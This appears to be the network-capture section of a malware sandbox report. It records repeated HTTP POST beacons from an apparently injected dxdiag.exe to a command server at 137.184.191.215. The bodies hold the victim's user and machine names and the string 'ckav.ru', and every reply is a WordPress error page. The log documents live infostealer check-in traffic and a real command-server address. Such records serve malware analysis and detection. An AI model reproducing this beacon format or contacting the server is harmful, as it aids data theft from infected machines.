                        Oct 1, 2024 07:47:10.510857105 CEST | 251 | OUT | POST /index.php/check.php?id=1 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 137.184.191.215
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: C7D7BA0
                        Content-Length: 153
                        Connection: close
                        Oct 1, 2024 07:47:10.515717030 CEST | 153 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.rualfons116938ALFONS-PC0FDD42EE188E931437F4FBE2C
                        Oct 1, 2024 07:47:13.404769897 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                        Date: Tue, 01 Oct 2024 05:47:11 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        4 | 192.168.2.5 | 49719 | 137.184.191.215 | 80 | 2072 | C:\Windows\SysWOW64\dxdiag.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Oct 1, 2024 07:47:13.559503078 CEST | 251 | OUT | POST /index.php/check.php?id=1 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 137.184.191.215
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: C7D7BA0
                        Content-Length: 153
                        Connection: close
                        Oct 1, 2024 07:47:13.564543962 CEST | 153 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.rualfons116938ALFONS-PC0FDD42EE188E931437F4FBE2C
                        Oct 1, 2024 07:47:16.115521908 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                        Date: Tue, 01 Oct 2024 05:47:14 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        5 | 192.168.2.5 | 49721 | 137.184.191.215 | 80 | 2072 | C:\Windows\SysWOW64\dxdiag.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Oct 1, 2024 07:47:16.273866892 CEST | 251 | OUT | POST /index.php/check.php?id=1 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 137.184.191.215
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: C7D7BA0
                        Content-Length: 153
                        Connection: close
                        Oct 1, 2024 07:47:16.278702021 CEST | 153 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.rualfons116938ALFONS-PC0FDD42EE188E931437F4FBE2C
                        Oct 1, 2024 07:47:18.942929029 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                        Date: Tue, 01 Oct 2024 05:47:16 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        6 | 192.168.2.5 | 49722 | 137.184.191.215 | 80 | 2072 | C:\Windows\SysWOW64\dxdiag.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Oct 1, 2024 07:47:19.092948914 CEST | 251 | OUT | POST /index.php/check.php?id=1 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 137.184.191.215
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: C7D7BA0
                        Content-Length: 153
                        Connection: close
                        Oct 1, 2024 07:47:19.097881079 CEST | 153 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.rualfons116938ALFONS-PC0FDD42EE188E931437F4FBE2C
                        Oct 1, 2024 07:47:21.708636999 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                        Date: Tue, 01 Oct 2024 05:47:19 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        7 | 192.168.2.5 | 49723 | 137.184.191.215 | 80 | 2072 | C:\Windows\SysWOW64\dxdiag.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Oct 1, 2024 07:47:21.872013092 CEST | 251 | OUT | POST /index.php/check.php?id=1 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 137.184.191.215
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: C7D7BA0
                        Content-Length: 153
                        Connection: close
                        Oct 1, 2024 07:47:21.877834082 CEST | 153 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.rualfons116938ALFONS-PC0FDD42EE188E931437F4FBE2C
                        Oct 1, 2024 07:47:24.486816883 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                        Date: Tue, 01 Oct 2024 05:47:22 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        8 | 192.168.2.5 | 49724 | 137.184.191.215 | 80 | 2072 | C:\Windows\SysWOW64\dxdiag.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Oct 1, 2024 07:47:24.637128115 CEST | 251 | OUT | POST /index.php/check.php?id=1 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 137.184.191.215
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: C7D7BA0
                        Content-Length: 153
                        Connection: close
                        Oct 1, 2024 07:47:24.642066956 CEST | 153 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.rualfons116938ALFONS-PC0FDD42EE188E931437F4FBE2C
                        Oct 1, 2024 07:47:27.344994068 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                        Date: Tue, 01 Oct 2024 05:47:25 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        9 | 192.168.2.5 | 49725 | 137.184.191.215 | 80 | 2072 | C:\Windows\SysWOW64\dxdiag.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Oct 1, 2024 07:47:27.494178057 CEST | 251 | OUT | POST /index.php/check.php?id=1 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 137.184.191.215
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: C7D7BA0
                        Content-Length: 153
                        Connection: close
                        Oct 1, 2024 07:47:27.499222994 CEST | 153 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.rualfons116938ALFONS-PC0FDD42EE188E931437F4FBE2C
                        Oct 1, 2024 07:47:30.154274940 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                        Date: Tue, 01 Oct 2024 05:47:27 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                        Oct 1, 2024 07:47:30.154292107 CEST | 1236 | IN
                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                        Oct 1, 2024 07:47:30.154304028 CEST | 366 | IN
                        Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        10 | 192.168.2.5 | 49726 | 137.184.191.215 | 80 | 2072 | C:\Windows\SysWOW64\dxdiag.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Oct 1, 2024 07:47:30.310638905 CEST | 251 | OUT | POST /index.php/check.php?id=1 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 137.184.191.215
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: C7D7BA0
                        Content-Length: 153
                        Connection: close
                        Oct 1, 2024 07:47:30.316653013 CEST | 153 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.rualfons116938ALFONS-PC0FDD42EE188E931437F4FBE2C
                        Oct 1, 2024 07:47:32.878415108 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                        Date: Tue, 01 Oct 2024 05:47:30 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                        Oct 1, 2024 07:47:32.878442049 CEST | 224 | IN
                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
                        Oct 1, 2024 07:47:32.878451109 CEST | 1236 | IN
                        Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
                        Oct 1, 2024 07:47:32.878458023 CEST | 142 | IN
                        Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        11 | 192.168.2.5 | 49727 | 137.184.191.215 | 80 | 2072 | C:\Windows\SysWOW64\dxdiag.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Oct 1, 2024 07:47:33.028085947 CEST | 251 | OUT | POST /index.php/check.php?id=1 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 137.184.191.215
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: C7D7BA0
                        Content-Length: 153
                        Connection: close
                        Oct 1, 2024 07:47:33.034240961 CEST | 153 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.rualfons116938ALFONS-PC0FDD42EE188E931437F4FBE2C
                        Oct 1, 2024 07:47:35.676127911 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                        Date: Tue, 01 Oct 2024 05:47:33 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                        Oct 1, 2024 07:47:35.676151991 CEST | 1236 | IN
                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                        Oct 1, 2024 07:47:35.676165104 CEST | 366 | IN
                        Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        12 | 192.168.2.5 | 49728 | 137.184.191.215 | 80 | 2072 | C:\Windows\SysWOW64\dxdiag.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Oct 1, 2024 07:47:35.824728012 CEST | 251 | OUT | POST /index.php/check.php?id=1 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 137.184.191.215
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: C7D7BA0
                        Content-Length: 153
                        Connection: close
                        Oct 1, 2024 07:47:35.829673052 CEST | 153 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.rualfons116938ALFONS-PC0FDD42EE188E931437F4FBE2C
                        Oct 1, 2024 07:47:38.454127073 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                        Date: Tue, 01 Oct 2024 05:47:36 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                        Oct 1, 2024 07:47:38.454142094 CEST | 1236 | IN
                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                        Oct 1, 2024 07:47:38.454153061 CEST | 366 | IN
                        Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        13 | 192.168.2.5 | 49729 | 137.184.191.215 | 80 | 2072 | C:\Windows\SysWOW64\dxdiag.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Oct 1, 2024 07:47:38.616256952 CEST | 251 | OUT | POST /index.php/check.php?id=1 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 137.184.191.215
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: C7D7BA0
                        Content-Length: 153
                        Connection: close
                        Oct 1, 2024 07:47:38.621072054 CEST | 153 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.rualfons116938ALFONS-PC0FDD42EE188E931437F4FBE2C
                        Oct 1, 2024 07:47:41.422832966 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                        Date: Tue, 01 Oct 2024 05:47:39 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                        Oct 1, 2024 07:47:41.422853947 CEST | 1236 | IN
                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                        Oct 1, 2024 07:47:41.422866106 CEST | 366 | IN
                        Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress
                        Oct 1, 2024 07:47:41.619241953 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                        Date: Tue, 01 Oct 2024 05:47:39 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        14 | 192.168.2.5 | 49730 | 137.184.191.215 | 80 | 2072 | C:\Windows\SysWOW64\dxdiag.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Oct 1, 2024 07:47:41.692935944 CEST | 251 | OUT | POST /index.php/check.php?id=1 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 137.184.191.215
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: C7D7BA0
                        Content-Length: 153
                        Connection: close
                        Oct 1, 2024 07:47:41.697900057 CEST | 153 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.rualfons116938ALFONS-PC0FDD42EE188E931437F4FBE2C
                        Oct 1, 2024 07:47:44.200954914 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                        Date: Tue, 01 Oct 2024 05:47:42 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                        Oct 1, 2024 07:47:44.200973034 CEST | 224 | IN
                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
                        Oct 1, 2024 07:47:44.200984955 CEST | 1236 | IN
                        Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
                        Oct 1, 2024 07:47:44.200995922 CEST | 142 | IN
                        Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        15 | 192.168.2.5 | 49731 | 137.184.191.215 | 80 | 2072 | C:\Windows\SysWOW64\dxdiag.exe
